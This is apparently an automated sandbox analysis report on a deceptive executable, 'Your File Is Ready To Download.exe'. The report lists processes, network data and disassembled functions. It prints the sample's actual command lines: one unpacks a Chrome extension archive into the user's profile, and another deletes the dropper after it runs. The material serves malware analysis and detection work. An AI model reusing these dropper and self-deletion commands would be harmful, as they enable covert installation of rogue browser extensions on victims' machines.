2021-12-06 18:08:56 UTC	177	IN	Data Raw: 00 00 00 00 00 19 00 00 00 5f 6c 6f 63 61 6c 65 73 2f 61 72 2f 6d 65 73 73 61 67 65 73 2e 6a 73 6f 6e e5 5c 6d 6f 1b 37 12 fe 2b 3a 5f 3e b4 45 63 f3 75 49 06 ed 01 8a b5 76 b6 b1 25 57 2f 0e 52 04 10 64 5b 4e 82 4b e2 9c ed a0 38 04 fe ef 37 bb e4 7a 87 e2 50 92 d3 24 77 c0 7d 91 e5 5d 71 c8 19 ce cb 33 33 dc fd bc c3 19 b7 ce 2a 5d 70 65 ad 16 4c 73 b3 f3 a4 f7 79 e7 fd f2 e6 66 f1 7a 09 df 77 5e 7d 62 85 5a d4 9f a2 f9 54 b6 f9 14 cd 27 df b9 fb b9 b7 c3 05 97 4e 1b 67 85 11 d2 1a ed 04 a3 a8 08 e9 69 f5 9a 3f ba f9 2c 9a 7f 84 69 fe 51 f5 a7 74 cd 15 db 5d 97 bc fb 2e 16 c9 00 bf 2c 7c 25 2c d7 f5 d0 aa 9b e9 c4 99 ff 51 0f 2d a7 21 2e 0b 74 c3 73 28 fd 02 79 0f 2d 4d 75 4b 53 12 11 6f be f3 cb 20 0c 10 43 61 0d f0 c6 24 77 cc 68 52 16 66 95 48 20 6e Data Ascii: _locales/ar/messages.json\mo7+:_>EcuIv%W/Rd[NK87zP$w}]q33*]peLsyfzw^}bZT'Ngi?,iQt].,\|%,Q-!.ts(y-MuKSo Ca$whRfH n
2021-12-06 18:08:56 UTC	178	IN	Data Raw: ff 9a df 22 eb 45 29 6c bb 84 d4 3c 08 43 4d 27 72 ab 13 45 df b3 50 27 c7 2a a6 1d 34 06 e5 5b 82 48 b7 65 32 69 9a bf 05 ae 83 51 65 5c 62 f0 98 18 b3 0b 1c 53 71 96 ab d2 75 e0 4c 79 d9 c9 2c 84 df 50 94 40 08 8f 72 ec d9 34 b3 d7 2d 6a 1b dc d8 d2 c6 ba 8f 93 c9 a8 d0 11 b9 41 db 5d 27 d8 c3 46 11 a9 55 58 73 d1 8d 0e 1a e3 af 04 c9 62 08 91 86 3b b3 8b a4 4d 19 09 2e 0a e0 e5 a0 bd cf 2b f3 36 90 3c d5 7e 62 27 09 c5 c1 5c c8 54 99 d3 01 48 ef 23 03 72 71 56 89 38 c5 ce 33 48 36 17 d9 fd 62 43 86 be 9b 6a 30 21 d9 8b d5 5d 8f cb 54 5f a8 33 04 b2 4b ab 5f d8 13 04 7a c8 0e d9 79 0f dd 46 e2 6c 8d 5c d2 34 02 7b 58 ef 24 ae ac 98 8e ed 98 49 8b 2c 4d a2 a0 11 76 34 06 6e 78 9b 22 21 a0 a2 10 2e 75 44 a9 9d 88 a1 ec ea fe 46 da 9e 75 a6 58 b6 b8 34 18 Data Ascii: "E)l<CM'rEP'*4[He2iQe\bSquLy,P@r4-jA]'FUXsb;M.+6<~b'\TH#rqV83H6bCj0!]T_3K_zyFl\4{X$I,Mv4nx"!.uDFuX4

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: Your File Is Ready To Download.exe PID: 752 Parent PID: 5860

General

Start time:	19:08:31
Start date:	06/12/2021
Path:	C:\Users\user\Desktop\Your File Is Ready To Download.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\Your File Is Ready To Download.exe"
Imagebase:	0x140000000
File size:	1217816 bytes
MD5 hash:	B864CEFDEAC3D2C58DE4D14BAB8265F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: powershell.exe PID: 160 Parent PID: 752

General

Start time:	19:08:33
Start date:	06/12/2021
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	PowerShell.exe -Command Expand-Archive -LiteralPath 'C:\Users\user\AppData\Roaming\chromeext.zip' -DestinationPath 'C:\Users\user\AppData\Roaming\Chrome'
Imagebase:	0x7ff777fc0000
File size:	447488 bytes
MD5 hash:	95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6504 Parent PID: 160

General

Start time:	19:08:34
Start date:	06/12/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: chrome.exe PID: 7040 Parent PID: 752

General

Start time:	19:08:47
Start date:	06/12/2021
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized
Imagebase:	0x7ff68b0a0000
File size:	2150896 bytes
MD5 hash:	C139654B5C1438A95B321BB01AD63EF6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: chrome.exe PID: 6960 Parent PID: 7040

General

Start time:	19:08:49
Start date:	06/12/2021
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1560,9168717871619031808,7731561381671023239,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1908 /prefetch:8
Imagebase:	0x7ff68b0a0000
File size:	2150896 bytes
MD5 hash:	C139654B5C1438A95B321BB01AD63EF6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 1504 Parent PID: 752

General

Start time:	19:09:11
Start date:	06/12/2021
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c del "C:\Users\user\Desktop\Your File Is Ready To Download.exe"
Imagebase:	0x7ff6fa270000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 5108 Parent PID: 1504

General

Start time:	19:09:12
Start date:	06/12/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: Your File Is Ready To Download.exe PID: 752 Parent PID: 5860 Your File Is Ready To Download.exeCOMMON

Execution Graph

Execution Coverage:	2.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	51.3%
Total number of Nodes:	1865
Total number of Limit Nodes:	83

Executed Functions

Function 0000000140014BA0, Relevance: 83.0, APIs: 41, Strings: 6, Instructions: 755threadkeyboardlibraryCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 0000000140014C6E
CreateMutexW.KERNEL32 ref: 0000000140014C7F
GetLastError.KERNEL32 ref: 0000000140014C88
CloseHandle.KERNEL32 ref: 0000000140014CAB
GetWindowThreadProcessId.USER32 ref: 0000000140014D44
AttachThreadInput.USER32 ref: 0000000140014D7F
GetKeyboardLayout.USER32 ref: 0000000140014EE5

Part of subcall function 00000001400C9144: _errno.LIBCMT ref: 00000001400C9162
Part of subcall function 00000001400C9144: _invalid_parameter_noinfo.LIBCMT ref: 00000001400C916D

GetTickCount.KERNEL32 ref: 0000000140014D9F
GetCurrentThreadId.KERNEL32 ref: 0000000140014DE0
GetAsyncKeyState.USER32 ref: 0000000140014E15
GetAsyncKeyState.USER32 ref: 0000000140014E25
GetForegroundWindow.USER32 ref: 0000000140014E8F
GetWindowThreadProcessId.USER32 ref: 0000000140014E9F
GetGUIThreadInfo.USER32 ref: 0000000140014EBA
GetWindowThreadProcessId.USER32 ref: 0000000140014ED2
GetProcAddress.KERNEL32 ref: 0000000140014F50
FreeLibrary.KERNEL32 ref: 0000000140014F6D
GetTickCount.KERNEL32 ref: 0000000140014FC4
BlockInput.USER32 ref: 000000014001513D
GetTickCount.KERNEL32 ref: 000000014001517F
PeekMessageW.USER32 ref: 00000001400151AA
GetTickCount.KERNEL32 ref: 00000001400151D1

Strings

{Text}, xrefs: 0000000140014C17
{Blind}, xrefs: 0000000140014BEE
^+!#{}, xrefs: 00000001400151E8
{Click, xrefs: 0000000140014CC7
KbdLayerDescriptor, xrefs: 0000000140014F46
AHK Keybd, xrefs: 0000000140014C74

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: Thread$CountTickWindow$Process$AsyncCloseHandleInputState$AddressAttachBlockCreateCurrentErrorForegroundFreeInfoKeyboardLastLayoutLibraryMessageMutexPeekProc_errno_invalid_parameter_noinfo
String ID: AHK Keybd$KbdLayerDescriptor$^+!#{}${Blind}${Click${Text}
API String ID: 4276635616-2714328142
Opcode ID: b4484f7a6154cae6bae15ad0fcdeb02ab40105df5a35eac3e4a0612e0d447eaf
Instruction ID: b6aca26402dbd9a584f7ca152b4954a8adead1e6d94965108ae59bc031915438
Opcode Fuzzy Hash: b4484f7a6154cae6bae15ad0fcdeb02ab40105df5a35eac3e4a0612e0d447eaf
Instruction Fuzzy Hash: F872BC312016808AFB6BAF37A8543E93BE1A74DB89F084019FB460F6F5DB3AC945C751

Uniqueness

Uniqueness Score: -1.00%

Function 000000014001E310, Relevance: 72.1, APIs: 35, Strings: 6, Instructions: 309
windowsleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32 ref: 000000014001E384
Sleep.KERNEL32 ref: 000000014001E390
GetTickCount.KERNEL32 ref: 000000014001E3A0
GetExitCodeThread.KERNEL32 ref: 000000014001E3BF
GetTickCount.KERNEL32 ref: 000000014001E3D2
Sleep.KERNEL32 ref: 000000014001E3E3
CloseHandle.KERNEL32 ref: 000000014001E3F2
CreateMutexW.KERNEL32 ref: 000000014001E41D
CloseHandle.KERNEL32 ref: 000000014001E438
CreateMutexW.KERNEL32 ref: 000000014001E45F
CloseHandle.KERNEL32 ref: 000000014001E47B
Shell_NotifyIconW.SHELL32 ref: 000000014001E4CC
IsWindow.USER32 ref: 000000014001E4E8
DestroyWindow.USER32 ref: 000000014001E4F5
DeleteObject.GDI32 ref: 000000014001E504
DeleteObject.GDI32 ref: 000000014001E513
DeleteObject.GDI32 ref: 000000014001E522
DeleteObject.GDI32 ref: 000000014001E545
DestroyIcon.USER32 ref: 000000014001E54D
IsWindow.USER32 ref: 000000014001E55C
DestroyWindow.USER32 ref: 000000014001E56A
DeleteObject.GDI32 ref: 000000014001E579
DeleteObject.GDI32 ref: 000000014001E588
DeleteObject.GDI32 ref: 000000014001E597
DeleteObject.GDI32 ref: 000000014001E5F4
DestroyIcon.USER32 ref: 000000014001E619
DestroyIcon.USER32 ref: 000000014001E626
IsWindow.USER32 ref: 000000014001E668
DestroyWindow.USER32 ref: 000000014001E675
DeleteObject.GDI32 ref: 000000014001E690
ChangeClipboardChain.USER32 ref: 000000014001E6E1
mciSendStringW.WINMM ref: 000000014001E70C
mciSendStringW.WINMM ref: 000000014001E729
DeleteCriticalSection.KERNEL32 ref: 000000014001E736
OleUninitialize.OLE32 ref: 000000014001E73C

Strings

status AHK_PlayMe mode, xrefs: 000000014001E705
AHK Mouse, xrefs: 000000014001E454
2, xrefs: 000000014001E398
close AHK_PlayMe, xrefs: 000000014001E722
Warning: The keyboard and/or mouse hook could not be activated; some parts of the script will not function., xrefs: 000000014001E4A4
AHK Keybd, xrefs: 000000014001E412

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: Delete$Object$DestroyWindow$Icon$CloseHandle$CountCreateMutexSendSleepStringThreadTick$ChainChangeClipboardCodeCriticalExitMessageNotifyPostSectionShell_Uninitialize
String ID: 2$AHK Keybd$AHK Mouse$Warning: The keyboard and/or mouse hook could not be activated; some parts of the script will not function.$close AHK_PlayMe$status AHK_PlayMe mode
API String ID: 2336381626-2823248856
Opcode ID: 536fcb709e031f675d40a0d53f38a6471f96609f5d4677f3a3aebe50a4842947
Instruction ID: fbc89e23a0ae570d136b2c5b4310d3c364cbfaa3f00c522c090f31251781069b
Opcode Fuzzy Hash: 536fcb709e031f675d40a0d53f38a6471f96609f5d4677f3a3aebe50a4842947
Instruction Fuzzy Hash: 4FE10635201A8086FB6A9F67E8547ED23A1BB9CFC8F484525EB1A4B6B4DF39C845C350

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140055950, Relevance: 61.7, APIs: 33, Strings: 2, Instructions: 455
registrywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegisterWindowMessageW.USER32 ref: 000000014005598D

Strings

TaskbarCreated, xrefs: 0000000140055980
, xrefs: 0000000140055D94

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: MessageRegisterWindow
String ID: $TaskbarCreated
API String ID: 1814269913-2756569325
Opcode ID: 291dd6086e99dd9d6f8bbaaf5691275a1f065325395cc6b74e9419111b1670fe
Instruction ID: 10a70ac5a9c71e9686d6df8eb2443ac56088ee968df548d9cd342b1781673693
Opcode Fuzzy Hash: 291dd6086e99dd9d6f8bbaaf5691275a1f065325395cc6b74e9419111b1670fe
Instruction Fuzzy Hash: 9F229A352006808AEB66DF23E4543EA77A1F74CBC5F544125EB8A47BB5DB3ED846CB00

Uniqueness

Uniqueness Score: -1.00%

Function 000000014001EB30, Relevance: 54.5, APIs: 22, Strings: 9, Instructions: 228
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00000001400ADC60: LoadLibraryExW.KERNEL32 ref: 00000001400ADC93
Part of subcall function 00000001400ADC60: FindResourceW.KERNEL32 ref: 00000001400ADD18
Part of subcall function 00000001400ADC60: LoadResource.KERNEL32 ref: 00000001400ADD2D
Part of subcall function 00000001400ADC60: LockResource.KERNEL32 ref: 00000001400ADD3F
Part of subcall function 00000001400ADC60: GetSystemMetrics.USER32 ref: 00000001400ADD5F
Part of subcall function 00000001400ADC60: FindResourceW.KERNEL32 ref: 00000001400ADDD5
Part of subcall function 00000001400ADC60: LoadResource.KERNEL32 ref: 00000001400ADDE9
Part of subcall function 00000001400ADC60: LockResource.KERNEL32 ref: 00000001400ADDF7

GetSystemMetrics.USER32 ref: 000000014001EBC8

Part of subcall function 00000001400ADC60: EnumResourceNamesW.KERNEL32 ref: 00000001400ADCFB
Part of subcall function 00000001400ADC60: SizeofResource.KERNEL32 ref: 00000001400ADE0B
Part of subcall function 00000001400ADC60: CreateIconFromResourceEx.USER32 ref: 00000001400ADE2E

LoadCursorW.USER32 ref: 000000014001EC0A
RegisterClassExW.USER32 ref: 000000014001EC35
RegisterClassExW.USER32 ref: 000000014001EC5C
GetForegroundWindow.USER32 ref: 000000014001EC93
GetClassNameW.USER32 ref: 000000014001ECAF
CreateWindowExW.USER32 ref: 000000014001ED32
GetMenu.USER32 ref: 000000014001ED4B
EnableMenuItem.USER32 ref: 000000014001ED62
CreateWindowExW.USER32 ref: 000000014001EDC1
GetDC.USER32 ref: 000000014001EE1E
GetDeviceCaps.GDI32 ref: 000000014001EE48
MulDiv.KERNEL32 ref: 000000014001EE59
CreateFontW.GDI32 ref: 000000014001EE9D
ReleaseDC.USER32 ref: 000000014001EEB4
SendMessageW.USER32 ref: 000000014001EECF
SendMessageW.USER32 ref: 000000014001EEE7
ShowWindow.USER32 ref: 000000014001EEF6
ShowWindow.USER32 ref: 000000014001EF05
ShowWindow.USER32 ref: 000000014001EF24
SetWindowLongW.USER32 ref: 000000014001EF38
LoadAcceleratorsW.USER32 ref: 000000014001EF4A

Strings

Lucida Console, xrefs: 000000014001EE2B
edit, xrefs: 000000014001EDA5
Consolas, xrefs: 000000014001EE35
RegClass, xrefs: 000000014001EC6B
AutoHotkey, xrefs: 000000014001EB77
CreateWindow, xrefs: 000000014001EDD7
AutoHotkey2, xrefs: 000000014001EC40
Shell_TrayWnd, xrefs: 000000014001ECB9
P, xrefs: 000000014001EBA2

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: Resource$Window$Load$Create$ClassShow$FindLockMenuMessageMetricsRegisterSendSystem$AcceleratorsCapsCursorDeviceEnableEnumFontForegroundFromIconItemLibraryLongNameNamesReleaseSizeof
String ID: AutoHotkey$AutoHotkey2$Consolas$CreateWindow$Lucida Console$P$RegClass$Shell_TrayWnd$edit
API String ID: 221421807-2636979444
Opcode ID: 90afefe1982542b1df402e3b2bbab0c3d094468b07abbb46b60687b060dd9300
Instruction ID: deccdb4611fe9f85c5c7160099d911744b73bf0f286478aee23196a717939e1f
Opcode Fuzzy Hash: 90afefe1982542b1df402e3b2bbab0c3d094468b07abbb46b60687b060dd9300
Instruction Fuzzy Hash: 3FC13A35209B8086E7629B22F8547DE73A4FB8DBD4F540129EB8A4BB74DF39C446CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400415D0, Relevance: 53.1, APIs: 12, Strings: 18, Instructions: 597processlibraryloaderCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32 ref: 0000000140041AC1
CloseHandle.KERNEL32 ref: 0000000140041AD4
GetLastError.KERNEL32 ref: 0000000140041B00
SetCurrentDirectoryW.KERNEL32 ref: 0000000140041C2D
GetFileAttributesW.KERNEL32 ref: 0000000140041CAF
SetCurrentDirectoryW.KERNEL32 ref: 0000000140041D0B
ShellExecuteExW.SHELL32 ref: 0000000140041D23
GetModuleHandleW.KERNEL32 ref: 0000000140041D4C
GetProcAddress.KERNEL32 ref: 0000000140041D5C
CloseHandle.KERNEL32 ref: 0000000140041DD0
GetLastError.KERNEL32 ref: 0000000140041DDE
FormatMessageW.KERNEL32 ref: 0000000140041E37

Strings

.exe.bat.com.cmd.hta, xrefs: 0000000140041C98
edit, xrefs: 00000001400416BA, 00000001400417D0
Failed attempt to launch program or document:, xrefs: 0000000140041EDE
Launch Error (possibly related to RunAs):, xrefs: 0000000140041EB6
properties, xrefs: 00000001400416E0, 00000001400417F6, 0000000140041B65
%sAction: <%-0.400s%s>%sParams: <%-0.400s%s>, xrefs: 0000000140041EBD
find, xrefs: 0000000140041681, 0000000140041797
System verbs unsupported with RunAs., xrefs: 000000014004189A
open, xrefs: 00000001400416A7, 00000001400417BD
%s %s, xrefs: 00000001400419A7
Verb: <%s>, xrefs: 0000000140041E46
..., xrefs: 0000000140041E71
explore, xrefs: 0000000140041694, 00000001400417AA
print, xrefs: 00000001400416CD, 00000001400417E3
kernel32.dll, xrefs: 0000000140041D3F
String too long., xrefs: 00000001400418E1
\/., xrefs: 0000000140041C63
GetProcessId, xrefs: 0000000140041D52

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: Handle$CloseCurrentDirectoryErrorLast$AddressAttributesCreateExecuteFileFormatMessageModuleProcProcessShell
String ID: Verb: <%s>$%sAction: <%-0.400s%s>%sParams: <%-0.400s%s>$%s %s$...$.exe.bat.com.cmd.hta$Failed attempt to launch program or document:$GetProcessId$Launch Error (possibly related to RunAs):$String too long.$System verbs unsupported with RunAs.$\/.$edit$explore$find$kernel32.dll$open$print$properties
API String ID: 187721205-758568768
Opcode ID: 471131ebf4bda3c1ac380055e9bd9c2b49a3ac24d086a7616b605554f189cd59
Instruction ID: 6a9bd07949d4fcb760873eb5b0fd3d8ce3bba799bfa8d67ab086fd5e611208b7
Opcode Fuzzy Hash: 471131ebf4bda3c1ac380055e9bd9c2b49a3ac24d086a7616b605554f189cd59
Instruction Fuzzy Hash: 5C428D31604B9095EB66DF22A8403E923A4FB8DBE8F494225FF5947BE9EF38C545C344

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140001B0C, Relevance: 51.4, APIs: 28, Strings: 1, Instructions: 620timewindowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 0000000140001B3D
CloseClipboard.USER32 ref: 0000000140001B4A
SetTimer.USER32 ref: 0000000140001BFA
GetTickCount.KERNEL32 ref: 0000000140001CC6
GetTickCount.KERNEL32 ref: 0000000140001D21
GetMessageW.USER32 ref: 0000000140001D64
GetTickCount.KERNEL32 ref: 0000000140001D73

Strings

#32770, xrefs: 0000000140002A79

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessageTimerUnlock
String ID: #32770
API String ID: 1115112458-463685578
Opcode ID: b2009a66af35570ec9bdce5f5762ba844639f0ad7a31dc4d085b2c65bef5c8fa
Instruction ID: f9e8195622c78a912830177e5ffa7a406774e739d0b7d5f3ef3fa34a85a4024a
Opcode Fuzzy Hash: b2009a66af35570ec9bdce5f5762ba844639f0ad7a31dc4d085b2c65bef5c8fa
Instruction Fuzzy Hash: EB5261B26056808AFB67CB27B8543E937A1F78DBC8F184016EB49477B5DB79C981C710

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140005230, Relevance: 44.4, APIs: 15, Strings: 10, Instructions: 637sleepwindowCOMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32 ref: 000000014000524D
SetErrorMode.KERNEL32 ref: 0000000140005258

Part of subcall function 0000000140063700: GetCurrentDirectoryW.KERNEL32(?,0000000140005265), ref: 000000014006371C

wcsncpy.LIBCMT ref: 0000000140005856
FindWindowW.USER32 ref: 0000000140005A7A
FindWindowW.USER32 ref: 0000000140005AE8
PostMessageW.USER32 ref: 0000000140005B0C
Sleep.KERNEL32 ref: 0000000140005B1A
IsWindow.USER32 ref: 0000000140005B23
Sleep.KERNEL32 ref: 0000000140005B63
IsWindow.USER32 ref: 0000000140005B6C
Sleep.KERNEL32 ref: 0000000140005B7B
SystemParametersInfoW.USER32 ref: 0000000140005B92
SystemParametersInfoW.USER32 ref: 0000000140005BB5
malloc.LIBCMT ref: 0000000140005BFF

Strings

A_Args, xrefs: 0000000140005841, 000000014000591E
Out of memory., xrefs: 00000001400056BF
/force, xrefs: 000000014000572F
Memory limit reached (see #MaxMem in the help file)., xrefs: 0000000140005473
Clipboard, xrefs: 0000000140005C34, 0000000140005C72
/restart, xrefs: 0000000140005705
AutoHotkey, xrefs: 0000000140005A73, 0000000140005AE1
An older instance of this script is already running. Replace it with this instance?Note: To avoid this message, see #SingleInsta, xrefs: 0000000140005AA7
Could not close the previous instance of this script. Keep waiting?, xrefs: 0000000140005B38
/ErrorStdOut, xrefs: 0000000140005742

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: Window$Sleep$FindInfoParametersSystem$CriticalCurrentDirectoryErrorInitializeMessageModePostSectionmallocwcsncpy
String ID: /ErrorStdOut$/force$/restart$A_Args$An older instance of this script is already running. Replace it with this instance?Note: To avoid this message, see #SingleInsta$AutoHotkey$Clipboard$Could not close the previous instance of this script. Keep waiting?$Memory limit reached (see #MaxMem in the help file).$Out of memory.
API String ID: 2566495380-2645802949
Opcode ID: bff7d64b8f8432795a84a9f4655cc25003ab4d2dbd136d0db3873710a4e963b1
Instruction ID: edc770666cac76ee2ced73777439dfce5b6a7653ca6ef59a822db6353ee09248
Opcode Fuzzy Hash: bff7d64b8f8432795a84a9f4655cc25003ab4d2dbd136d0db3873710a4e963b1
Instruction Fuzzy Hash: 8C52BF72204B8186FB67EB26F4503EA67A1FB8EBD5F444112FB4A476B5EB38C941C740

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400D1724, Relevance: 44.2, APIs: 24, Strings: 1, Instructions: 465
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__doserrno.LIBCMT ref: 00000001400D177A
_errno.LIBCMT ref: 00000001400D1781
_invalid_parameter_noinfo.LIBCMT ref: 00000001400D178C

Strings

U, xrefs: 00000001400D1D08

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
